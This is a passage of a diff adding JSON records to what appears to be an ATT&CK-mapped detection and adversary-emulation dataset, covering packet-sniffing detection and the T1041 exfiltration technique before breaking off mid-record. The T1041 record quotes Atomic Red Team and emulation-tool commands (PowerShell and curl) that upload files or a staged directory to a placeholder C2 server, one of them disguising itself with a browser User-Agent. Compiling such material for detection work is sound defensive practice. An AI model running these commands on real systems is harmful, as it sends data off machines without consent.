"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1040/T1040.yaml" + ], + "logsource": { + "category": "process_creation", + "product": "windows" + }, + "detection": { + "selection": [ + { + "Image|endswith": "\\tshark.exe", + "CommandLine|contains": "-i" + }, + { + "Image|endswith": "\\windump.exe" + } + ], + "condition": "selection" + }, + "falsepositives": [ + "Admin activity" + ], + "fields": [ + "Image", + "CommandLine", + "User", + "LogonGuid", + "Hashes", + "ParentProcessGuid", + "ParentCommandLine" + ], + "level": "low", + "tags": [ + "attack.credential_access", + "attack.discovery", + "attack.t1040" + ] + }, + [ + "Network device logs" + ], + [ + "Host network interface" + ], + [ + "Netflow/Enclave netflow" + ], + [ + "Network device logs" + ], + [ + "Host network interface" + ], + [ + "Netflow/Enclave netflow" + ], + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "user", + "relationship": "created", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "thread" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "user", + "relationship": "executed", + "target_data_element": "command" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "process", + "relationship": "executed", + "target_data_element": "command" + } + ], + "external_reference": [ + "https://www.symantec.com/blogs/threat-intelligence/elfin-apt33-espionage", + "https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/rpt-apt28.pdf", + "https://arstechnica.com/information-technology/2018/07/from-bitly-to-x-agent-how-gru-hackers-targeted-the-2016-presidential-election/", + "https://asert.arbornetworks.com/stolen-pencil-campaign-targets-academia/", + [ + "https://docs.microsoft.com/en-us/windows/win32/procthread/processes-and-threads" + ], + [ + "https://tools.ietf.org/id/draft-ietf-opsawg-tacacs-07.html#rfc.section.7.2", + "https://tools.ietf.org/html/rfc2866" + ] + ] + }, + { + "technique_id": "T1041", + "command_list": [ + "if(-not (Test-Path #{filepath})){ \n 1..100 | ForEach-Object { Add-Content -Path #{filepath} -Value \"This is line $_.\" }\n}\n[System.Net.ServicePointManager]::Expect100Continue = $false\n$filecontent = Get-Content -Path #{filepath}\nInvoke-WebRequest -Uri example.com -Method POST -Body $filecontent -DisableKeepAlive\n", + "if(-not (Test-Path $env:TEMP\\LineNumbers.txt)){ \n 1..100 | ForEach-Object { Add-Content -Path $env:TEMP\\LineNumbers.txt -Value \"This is line $_.\" }\n}\n[System.Net.ServicePointManager]::Expect100Continue = $false\n$filecontent = Get-Content -Path $env:TEMP\\LineNumbers.txt\nInvoke-WebRequest -Uri #{destination_url} -Method POST -Body $filecontent -DisableKeepAlive\n", + "curl -F \"data=@#{host.dir.compress}\" --header \"X-Request-ID: `hostname`-#{paw}\" #{server}/file/upload\n", + "$ErrorActionPreference = 'Stop';\n$fieldName = \"#{host.dir.compress}\";\n$filePath = \"#{host.dir.compress}\";\n$url = \"#{server}/file/upload\";\n\nAdd-Type -AssemblyName 'System.Net.Http';\n\n$client = New-Object System.Net.Http.HttpClient;\n$content = New-Object System.Net.Http.MultipartFormDataContent;\n$fileStream = [System.IO.File]::OpenRead($filePath);\n$fileName = [System.IO.Path]::GetFileName($filePath);\n$fileContent = New-Object System.Net.Http.StreamContent($fileStream);\n$content.Add($fileContent, $fieldName, $fileName);\n$client.DefaultRequestHeaders.Add(\"X-Request-Id\", $env:COMPUTERNAME + '-#{paw}');\n$client.DefaultRequestHeaders.Add(\"User-Agent\",\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36\");\n\n$result = $client.PostAsync($url, $content).Result;\n$result.EnsureSuccessStatusCode();\n" + ], + "commands": [ + { + "command": "if(-not (Test-Path #{filepath})){ \n 1..100 | ForEach-Object { Add-Content -Path #{filepath} -Value \"This is line $_.\" }\n}\n[System.Net.ServicePointManager]::Expect100Continue = $false\n$filecontent = Get-Content -Path #{filepath}\nInvoke-WebRequest -Uri example.com -Method POST -Body $filecontent -DisableKeepAlive\n", + "source": "atomics/T1041/T1041.yaml", + "name": "Atomic Red Team Test - Exfiltration Over C2 Channel" + }, + { + "command": "if(-not (Test-Path $env:TEMP\\LineNumbers.txt)){ \n 1..100 | ForEach-Object { Add-Content -Path $env:TEMP\\LineNumbers.txt -Value \"This is line $_.\" }\n}\n[System.Net.ServicePointManager]::Expect100Continue = $false\n$filecontent = Get-Content -Path $env:TEMP\\LineNumbers.txt\nInvoke-WebRequest -Uri #{destination_url} -Method POST -Body $filecontent -DisableKeepAlive\n", + "source": "atomics/T1041/T1041.yaml", + "name": "Atomic Red Team Test - Exfiltration Over C2 Channel" + }, + { + "command": "curl -F \"data=@#{host.dir.compress}\" --header \"X-Request-ID: `hostname`-#{paw}\" #{server}/file/upload\n", + "source": "data/abilities/exfiltration/ea713bc4-63f0-491c-9a6f-0b01d560b87e.yml", + "name": "Exfil the staged directory" + }, + { + "command": "$ErrorActionPreference = 'Stop';\n$fieldName = \"#{host.dir.compress}\";\n$filePath = \"#{host.dir.compress}\";\n$url = \"#{server}/file/upload\";\n\nAdd-Type -AssemblyName 'System.Net.Http';\n\n$client = New-Object System.Net.Http.HttpClient;\n$content = New-Object System.Net.Http.MultipartFormDataContent;\n$fileStream = [System.IO.File]::OpenRead($filePath);\n$fileName = [System.IO.Path]::GetFileName($filePath);\n$fileContent = New-Object System.Net.Http.StreamContent($fileStream);\n$content.Add($fileContent, $fieldName, $fileName);\n$client.DefaultRequestHeaders.Add(\"X-Request-Id\", $env:COMPUTERNAME + '-#{paw}');\n$client.DefaultRequestHeaders.Add(\"User-Agent\",\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36\");\n\n$result = $client.PostAsync($url, $content).Result;\n$result.EnsureSuccessStatusCode();\n", + "source": "data/abilities/exfiltration/ea713bc4-63f0-491c-9a6f-0b01d560b87e.yml", + "name": "Exfil the staged directory" + } + ], + "parsed_datasets": [ + { + "attack_technique": "T1041", + "display_name": "Exfiltration Over C2 Channel", + "atomic_tests": [ + { + "name": "C2 Data Exfiltration", + "auto_generated_guid": "d1253f6e-c29b-49dc-b466-2147a6191932", + "description": "Exfiltrates a file present on the victim machine to the C2 server.\n", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "destination_url": { + "description": "Destination URL to post encoded data.", + "type": "String", + "default": "example.com" + }, + "filepath": { + "description": "The file which is being exfiltrated to the C2 Server.", + "type": "Path", + "default": "$env:TEMP\\LineNumbers.txt" + } + }, + "executor": { + "command": "if(-not (Test-Path #{filepath})){ \n 1..100 | ForEach-Object { Add-Content -Path #{filepath} -Value \"This is line $_.\" }\n}\n[System.Net.ServicePointManager]::Expect100Continue = $false\n$filecontent = Get-Content -Path #{filepath}\nInvoke-WebRequest -Uri #{destination_url} -Method POST -Body $filecontent -DisableKeepAlive\n", + "name": "powershell" + } + } + ] + }, + { + "id": "ea713bc4-63f0-491c-9a6f-0b01d560b87e", + "name": "Exfil staged directory", + "description": "Exfil the staged directory", + "tactic": "exfiltration", + "technique": { + "attack_id": "T1041", + "name": "Exfiltration Over C2 Channel" + }, + "platforms": { + "darwin": { + "sh": { + "command": "curl -F \"data=@#{host.dir.compress}\" --header \"X-Request-ID: `hostname`-#{paw}\" #{server}/file/upload\n" + } + }, + "linux": { + "sh": { + "command": "curl -F \"data=@#{host.dir.compress}\" --header \"X-Request-ID: `hostname`-#{paw}\" #{server}/file/upload\n" + } + }, + "windows": { + "psh,pwsh": { + "command": "$ErrorActionPreference = 'Stop';\n$fieldName = \"#{host.dir.compress}\";\n$filePath = \"#{host.dir.compress}\";\n$url = \"#{server}/file/upload\";\n\nAdd-Type -AssemblyName 'System.Net.Http';\n\n$client = New-Object System.Net.Http.HttpClient;\n$content = New-Object System.Net.Http.MultipartFormDataContent;\n$fileStream = [System.IO.File]::OpenRead($filePath);\n$fileName = [System.IO.Path]::GetFileName($filePath);\n$fileContent = New-Object System.Net.Http.StreamContent($fileStream);\n$content.Add($fileContent, $fieldName, $fileName);\n$client.DefaultRequestHeaders.Add(\"X-Request-Id\", $env:COMPUTERNAME + '-#{paw}');\n$client.DefaultRequestHeaders.Add(\"User-Agent\",\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36\");\n\n$result = $client.PostAsync($url, $content).Result;\n$result.EnsureSuccessStatusCode();\n" + } + } + }, + "requirements": [ + { + "plugins.stockpile.app.requirements.paw_provenance": [ + { + "source": "host.dir.compress" + } + ] + } + ] + } + ], + "queries": [], + "possible_detections": [ + [ + "4688", + "Process Execution" + ], + [ + "5156", + "Windows Firewall" + ], + [ + "LMD - SRUM" + ], + [ + "User interface" + ], + [ + "4688", + "Process Execution" + ], + [ + "5156", + "Windows Firewall" + ], + [ + "LOG-MD", + "SRUM Netflow - Win 8 & 10" + ], + [ + "User interface" + ], + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted connection to", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted connection to", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted connection to", + "target_data_element": "host" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted connection from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted connection from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted connection from", + "target_data_element": "host" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "connected to", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "connected to", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "connected to", + "target_data_element": "host" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "connected from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "connected from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "connected from", + "target_data_element": "host" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "user", + "relationship": "connected to", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "user", + "relationship": "connected to", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "user", + "relationship": "connected to", + "target_data_element": "host" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "user", + "relationship": "connected from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "user", + "relationship": "connected from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "user", + "relationship": "connected from", + "target_data_element": "host" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted to bind on", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "bound to", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "permitted listener on", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "permitted listener on", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "permitted listener on", + "target_data_element": "process" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted to listen on", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "listened on", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked port bind on", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked port bind on", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked port bind on", + "target_data_element": "process" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection to", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection to", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection to", + "target_data_element": "process" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection from", + "target_data_element": "process" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection to", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection to", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked listener on", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked listener on", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked listener on", + "target_data_element": "process" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "originated from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "responded from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "originated from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "responded from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "identified", + "target_data_element": "transport layer protocol" + }, + { + "data_source": "network traffic", + "definition": 